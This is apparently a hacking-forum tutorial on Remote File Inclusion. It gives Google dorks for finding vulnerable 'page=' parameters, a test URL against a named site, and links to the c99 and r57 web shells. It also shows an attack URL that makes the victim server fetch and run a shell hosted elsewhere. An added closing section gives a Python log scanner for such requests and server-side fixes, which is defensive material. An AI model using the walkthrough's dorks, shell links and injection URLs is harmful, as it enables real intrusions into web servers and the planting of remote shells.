(RFI Attack) Remote File Inclusion Attack.
Remote File Inclusion (RFI) is one of the most commonly used vulnerabilities found on the web today. It allows us (the attacker) to put a remote file on the victim's server. If we are successful in performing the attack, we will have gained access to the victim site's web server and will be able to execute any type of command we want on it.
Firstly, I will show you how to search for the RFI vulnerability (something I failed to do in the LFI lesson =P).
The Remote File Inclusion vulnerability normally occurs in sites that have navigation similar to the one listed below:
www.victimsite.com/index.php?page=*whatever can be here*
The easiest way to find the vulnerability is to use a Google dork; I have provided two below:
inurl:index.php?page=
inurl:view.php?page=
This will show us pages in which "index.php?page=" or "view.php?page=" appear in the URL. The easiest way to see whether the site is vulnerable to Remote File Inclusion is to place "www.google.com" after the last "=" sign, like so:
www.victimsite.com/index.php?page=www.google.com
Let's say that the target website is http://www.zhcsucks.com
So the URL will become
http://www.zhcsucks.com/index.php?page=http://www.google.com
Now that we have executed the "command" on the page, if Google shows up, that's when we know that the website is vulnerable to the RFI attack. Clearly, if Google does not show up, move on to a different target site.
It is now time for us to upload a shell to the server to gain access. The easiest way of doing this is by using some of the most common shells around, c99 or r57 (or you can use the shell that milan millo just released; however, for this lesson, let's stick to c99 or r57). I will be using c99 for this example (and I do prefer it over other shells). I have placed links below to both the c99 and r57 shells:
./c99::http://www.sh3ll.org/c99.txt?
./r57::http://www.sh3ll.org/r57.txt?
Now we need to upload the shell to a web hosting site, such as 110mb.com, htmlpaste.com or ripway.com.
/* If this is an issue for any of you, let me know and I will write a guide on how to do this */
/* You may be able to use the links to the shells above instead of using external web hosting; however, I've always done it with external web hosting */
Now that we have it uploaded, we need to execute the shell on the target site to gain access. For example, if the URL of the shell is:
http://www.examplehosting.com/haxs/c99.txt?
Then we would have to execute the following URL to gain access to the victim site's server (remember to add a "?" at the end of the URL; it is very important that you do). It should look like so:
http://www.zhcsucks.com/index.php?page=http://www.examplehosting.com/haxs/c99.txt?
Your shell should look like the image below:
http://i43.tinypic.com/ej7cl5.png
You have now executed a shell on a target site.
/* There are many other tricks and ways of doing RFI; however, this is by far the simplest and easiest way. I will release the other ways in due time :) */
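From the defender's side, the requests described in this post stand out in web server access logs, because a navigation parameter such as `page` carries a full remote URL. The following added example (not part of the original post) scans combined-format log lines for that pattern; the function name, result fields and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client address, request target and status code of a combined-format log entry.
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
# A query parameter value that is itself a remote URL.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def find_rfi_attempts(log_lines):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        parts = urlsplit(target)
        # parse_qsl percent-decodes values, so encoded URLs are caught too.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                findings.append({
                    "client": client,
                    "path": parts.path,
                    "param": name,
                    "value": value,
                    # The post stresses the trailing "?"; record it as a signal.
                    "trailing_qmark": value.endswith("?"),
                    "status": status,
                })
    return findings

# Constructed sample lines (not real traffic), modelled on the URLs in the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Mar/2024:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "http://www.victimsite.com/" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2024:10:01:40 +0000] "GET /index.php?page=http://www.google.com HTTP/1.1" 200 14822 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2024:10:02:11 +0000] "GET /index.php?page=http://www.examplehosting.com/haxs/c99.txt? HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2024:10:05:09 +0000] "GET /view.php?page=http%3A%2F%2Fwww.examplehosting.com%2Fhaxs%2Fc99.txt%3F HTTP/1.1" 404 312 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_rfi_attempts(SAMPLE_LOG):
        print(finding)
```

A finding that was answered with status 200 deserves review first. The root fix is on the server: never pass a request parameter to `include`, map it through an allowlist of known page names, and keep PHP's `allow_url_include` setting off.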